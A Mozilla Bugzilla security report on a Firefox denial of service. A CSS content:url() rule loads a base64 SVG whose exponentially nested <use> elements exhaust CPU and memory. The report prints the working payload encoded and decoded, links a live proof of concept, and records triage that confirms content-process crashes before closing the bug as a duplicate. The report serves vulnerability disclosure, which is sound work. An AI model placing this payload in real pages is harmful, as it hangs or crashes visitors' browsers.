Closed
Bug 1909770
Opened 1 year ago
Closed 1 year ago
DoS via CSS content:url() with a malicious SVG (incl. Recursion) as Data-URI
Categories
(Core :: SVG, defect)
Core
SVG
Tracking
()
RESOLVED
DUPLICATE
of bug 455100
People
(Reporter: mozilla, Unassigned, NeedInfo)
References
()
Details
(Keywords: csectype-dos, reporter-external, Whiteboard: [client-bounty-form])
Attachments
(1 file)
|
2.45 KB,
image/svg+xml
|
Details |
svg testcase
It has been discovered that Firefox's rendering engine is vulnerable to client-side Denial-of-Service using the following HTML+CSS construct:
<p></p>
<style>
p {
content:url('data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjIiIGJhc2VQcm9maWxlPSJ0aW55IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB4PSIwcHgiIHk9IjBweCIgeG1sOnNwYWNlPSJwcmVzZXJ2ZSI+IDxwYXRoIGlkPSJhIiBkPSJNMCwwIi8+IDxnIGlkPSJiIj48dXNlIHhsaW5rOmhyZWY9IiNhIi8+PHVzZSB4bGluazpocmVmPSIjYSIvPjx1c2UgeGxpbms6aHJlZj0iI2EiLz48dXNlIHhsaW5rOmhyZWY9IiNhIi8+PHVzZSB4bGluazpocmVmPSIjYSIvPjx1c2UgeGxpbms6aHJlZj0iI2EiLz48dXNlIHhsaW5rOmhyZWY9IiNhIi8+PHVzZSB4bGluazpocmVmPSIjYSIvPjx1c2UgeGxpbms6aHJlZj0iI2EiLz48dXNlIHhsaW5rOmhyZWY9IiNhIi8+PC9nPiA8ZyBpZD0iYyI+PHVzZSB4bGluazpocmVmPSIjYiIvPjx1c2UgeGxpbms6aHJlZj0iI2IiLz48dXNlIHhsaW5rOmhyZWY9IiNiIi8+PHVzZSB4bGluazpocmVmPSIjYiIvPjx1c2UgeGxpbms6aHJlZj0iI2IiLz48dXNlIHhsaW5rOmhyZWY9IiNiIi8+PHVzZSB4bGluazpocmVmPSIjYiIvPjx1c2UgeGxpbms6aHJlZj0iI2IiLz48dXNlIHhsaW5rOmhyZWY9IiNiIi8+PHVzZSB4bGluazpocmVmPSIjYiIvPjwvZz4gPGcgaWQ9ImQiPjx1c2UgeGxpbms6aHJlZj0iI2MiLz48dXNlIHhsaW5rOmhyZWY9IiNjIi8+PHVzZSB4bGluazpocmVmPSIjYyIvPjx1c2UgeGxpbms6aHJlZj0iI2MiLz48dXNlIHhsaW5rOmhyZWY9IiNjIi8+PHVzZSB4bGluazpocmVmPSIjYyIvPjx1c2UgeGxpbms6aHJlZj0iI2MiLz48dXNlIHhsaW5rOmhyZWY9IiNjIi8+PHVzZSB4bGluazpocmVmPSIjYyIvPjx1c2UgeGxpbms6aHJlZj0iI2MiLz48L2c+IDxnIGlkPSJlIj48dXNlIHhsaW5rOmhyZWY9IiNkIi8+PHVzZSB4bGluazpocmVmPSIjZCIvPjx1c2UgeGxpbms6aHJlZj0iI2QiLz48dXNlIHhsaW5rOmhyZWY9IiNkIi8+PHVzZSB4bGluazpocmVmPSIjZCIvPjx1c2UgeGxpbms6aHJlZj0iI2QiLz48dXNlIHhsaW5rOmhyZWY9IiNkIi8+PHVzZSB4bGluazpocmVmPSIjZCIvPjx1c2UgeGxpbms6aHJlZj0iI2QiLz48dXNlIHhsaW5rOmhyZWY9IiNkIi8+PC9nPiA8ZyBpZD0iZiI+PHVzZSB4bGluazpocmVmPSIjZSIvPjx1c2UgeGxpbms6aHJlZj0iI2UiLz48dXNlIHhsaW5rOmhyZWY9IiNlIi8+PHVzZSB4bGluazpocmVmPSIjZSIvPjx1c2UgeGxpbms6aHJlZj0iI2UiLz48dXNlIHhsaW5rOmhyZWY9IiNlIi8+PHVzZSB4bGluazpocmVmPSIjZSIvPjx1c2UgeGxpbms6aHJlZj0iI2UiLz48dXNlIHhsaW5rOmhyZWY9IiNlIi8+PHVzZSB4bGluazpocmVmPSIjZSIvPjwvZz4gPGcgaWQ9ImciPjx1c2UgeGxpbms6aHJlZj0iI2YiLz48dXNlIHhsaW5rOmhyZWY9IiNmIi8+PHVzZSB4bGluazpocmVmPSIjZiIvPjx1c2UgeGxpbms6aHJlZj0iI2YiLz48dXNlIHhsaW5rOmhyZWY9IiNmIi8+PHVzZSB4bGluazpocmVmPSIjZiIvPjx1c2UgeGxpbms6aHJlZj0iI2YiLz48dXNlIHhsaW5rOmhyZWY9IiNmIi8+PHVzZSB4bGluazpocmVmPSIjZiIvPjx1c2UgeGxpbms6aHJlZj0iI2YiLz48L2c+IDxnIGlkPSJoIj48dXNlIHhsaW5rOmhyZWY9IiNnIi8+PHVzZSB4bGluazpocmVmPSIjZyIvPjx1c2UgeGxpbms6aHJlZj0iI2ciLz48dXNlIHhsaW5rOmhyZWY9IiNnIi8+PHVzZSB4bGluazpocmVmPSIjZyIvPjx1c2UgeGxpbms6aHJlZj0iI2ciLz48dXNlIHhsaW5rOmhyZWY9IiNnIi8+PHVzZSB4bGluazpocmVmPSIjZyIvPjx1c2UgeGxpbms6aHJlZj0iI2ciLz48dXNlIHhsaW5rOmhyZWY9IiNnIi8+PC9nPiA8ZyBpZD0iaSI+PHVzZSB4bGluazpocmVmPSIjaCIvPjx1c2UgeGxpbms6aHJlZj0iI2giLz48dXNlIHhsaW5rOmhyZWY9IiNoIi8+PHVzZSB4bGluazpocmVmPSIjaCIvPjx1c2UgeGxpbms6aHJlZj0iI2giLz48dXNlIHhsaW5rOmhyZWY9IiNoIi8+PHVzZSB4bGluazpocmVmPSIjaCIvPjx1c2UgeGxpbms6aHJlZj0iI2giLz48dXNlIHhsaW5rOmhyZWY9IiNoIi8+PHVzZSB4bGluazpocmVmPSIjaCIvPjwvZz4gPGcgaWQ9ImoiPjx1c2UgeGxpbms6aHJlZj0iI2kiLz48dXNlIHhsaW5rOmhyZWY9IiNpIi8+PHVzZSB4bGluazpocmVmPSIjaSIvPjx1c2UgeGxpbms6aHJlZj0iI2kiLz48dXNlIHhsaW5rOmhyZWY9IiNpIi8+PHVzZSB4bGluazpocmVmPSIjaSIvPjx1c2UgeGxpbms6aHJlZj0iI2kiLz48dXNlIHhsaW5rOmhyZWY9IiNpIi8+PHVzZSB4bGluazpocmVmPSIjaSIvPjx1c2UgeGxpbms6aHJlZj0iI2kiLz48L2c+IDwvc3ZnPg==');
}
</style>
The malicious SVG decodes to the following:
<svg version="1.2" baseProfile="tiny" xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" xml:space="preserve">
<path id="a" d="M0,0"/>
<g id="b">
<use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/>
</g><g id="c">
<use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/>
</g><g id="d">
<use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/>
</g> <g id="e">
<use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/>
</g> <g id="f">
<use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/>
</g> <g id="g">
<use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/>
</g> <g id="h">
<use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/>
</g> <g id="i"><use xlink:href="#h"/>
<use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/>
</g> <g id="j">
<use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/>
</g>
</svg>
PoCs
Firefox Nightly
- Navigate to https://x.lhq.at/p/66a1847e80840
- Observe excessive CPU usage
Thunderbird
Similar behaviour has been observed in Thunderbird's preview image, but could not be reproduced with .eml files.
Flags: sec-bounty?
|
||
Comment 1•1 year ago
|
||
|
|
||
Comment 2•1 year ago
|
||
As far as I can tell the bug here is the DoS from the SVG file. It does not matter if it's served as a separate SVG document (as in the attachment), as an <IMG> (which restricts some SVG features), from a data: URL, or using CSS.
Are all the parts of your bug summary necessary? If so, please explain how they affect this bug. There are lots of ways to serve content to victims and the CSS and data: URL parts might help you deploy the malicious SVG in some contexts, but they don't appear to have any impact on the DoS itself.
With that understanding (please correct me if I'm wrong about that!) I'll move this over to SVG to see if this is different than the recursion DoSs we know about.
Did reproduce the CPU and memory spike as expected, but Firefox eventually recovered when the parent killed the unresponsive child process
bp-6c4b8acc-4668-4a99-adf5-2a8680240725
On a machine with much less memory it might have caused problems for the parent process if its allocations started failing, too.
Group: firefox-core-security → core-security
Status: UNCONFIRMED → NEW
Component: Security → SVG
Ever confirmed: true
Flags: needinfo?(mozilla)
Keywords: csectype-dos
Product: Firefox → Core
|
|
||
Updated•1 year ago
|
Group: core-security → layout-core-security
|
|
||
Comment 3•1 year ago
|
||
Another content process crash at a different point in SVGUseElement handling, this time a MOZ_CRASH(OOM)
bp-50d45fe4-a7c5-4781-8e61-c2aaa0240725
|
|
||
Updated•1 year ago
|
Group: layout-core-security
Status: NEW → RESOLVED
Closed: 1 year ago
Duplicate of bug: 455100
Resolution: --- → DUPLICATE
|
|
||
Updated•1 year ago
|
Flags: sec-bounty? → sec-bounty-
You need to log in
before you can comment on or make changes to this bug.
Description
•